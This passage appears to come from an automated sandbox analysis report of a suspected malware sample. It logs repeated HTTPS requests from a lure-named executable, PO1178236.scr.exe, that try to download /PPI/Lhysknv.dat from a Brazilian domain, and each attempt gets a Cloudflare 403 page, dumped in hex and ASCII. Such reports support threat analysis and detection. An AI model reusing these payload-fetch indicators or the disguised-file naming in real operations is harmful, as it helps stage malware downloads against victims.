72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c29ed9d27286</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:37:07 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 39 65 64 39 64 32 37 32 38 36 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c29ed9d27286',t:'MTczNjQwODIyNy4wMDAwMDA='};var a
        2025-01-09 07:37:07 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        116192.168.2.949825188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:08 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:08 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:08 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:23 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0rrGJHSqbf9QUcW8wnW6bKHnI7blWYeZVUb5w3V6%2FWUpkflY%2F1V2WT1wgwiQVtlhm8Ligl5VzGqt2HPnC4d1sh5ZHFR7HQvybjKe34IhSMvtouYE4DrUeeWX7nlagXLPKcAXd3cfjPoaDKjt"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2a2aa9a429e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1662&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1710603&cwnd=208&unsent_bytes=0&cid=87ef6095ef11c5a7&ts=130&x=0"
        2025-01-09 07:37:08 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:08 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:37:08 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:37:08 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 61 32 61 61 39 61 34 32 39 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2a2aa9a429e</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:37:08 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 61 32 61 61 39 61 34 32 39 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2a2aa9a429e',t:'MTczNjQwODIyOC4wMDAwMDA='};var a=d
        2025-01-09 07:37:08 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        117192.168.2.949826188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:08 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:08 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:08 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:23 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e0JE5jeQH7cyHNloElgAq8tbCAp5F41NZvvUjfMXeZFel908CXL6QnCZBjjAert2tTGowCwSs%2FAr6QMxhfxvuHVP5twXjwlywltZZ26GuB4K%2F3qm8olpwOaihNJWvwtupv9iWWKRRP1SmlCs"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2a6af2a43e8-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2385&min_rtt=2385&rtt_var=895&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1221757&cwnd=214&unsent_bytes=0&cid=28d19292cc656ce8&ts=162&x=0"
        2025-01-09 07:37:08 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:08 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:37:08 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:37:08 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 61 36 61 66 32 61 34 33 65 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2a6af2a43e8</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:37:08 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 61 36 61 66 32 61 34 33 65 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2a6af2a43e8',t:'MTczNjQwODIyOC4wMDAwMDA='};var a=d
        2025-01-09 07:37:08 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        118192.168.2.949827188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:09 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:09 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:09 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:24 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1Mn1HXAhGe7lvDhbN02BwDgJPYKc268Qqw2z0dYlEOc4nhlRkIkwMNmluvkG%2FT3S7zVEU%2BNyOsFQdjB9U2OUNYhjzHaYk%2FoHRdeKIUAXX38q24%2BBVyGKY3aF6nxAbadRLsjquLLbMPCai5N1"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2aa7b19437e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1543&min_rtt=1537&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1837633&cwnd=238&unsent_bytes=0&cid=f43035afa2e14234&ts=130&x=0"
        2025-01-09 07:37:09 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:09 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:09 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:09 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 61 61 37 62 31 39 34 33 37 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2aa7b19437e</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:09 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 61 61 37 62 31 39 34 33 37 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2aa7b19437e',t:'MTczNjQwODIyOS4wMDAwMDA='};var
        2025-01-09 07:37:09 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        119192.168.2.949828188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:10 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:10 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:10 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:25 GMT
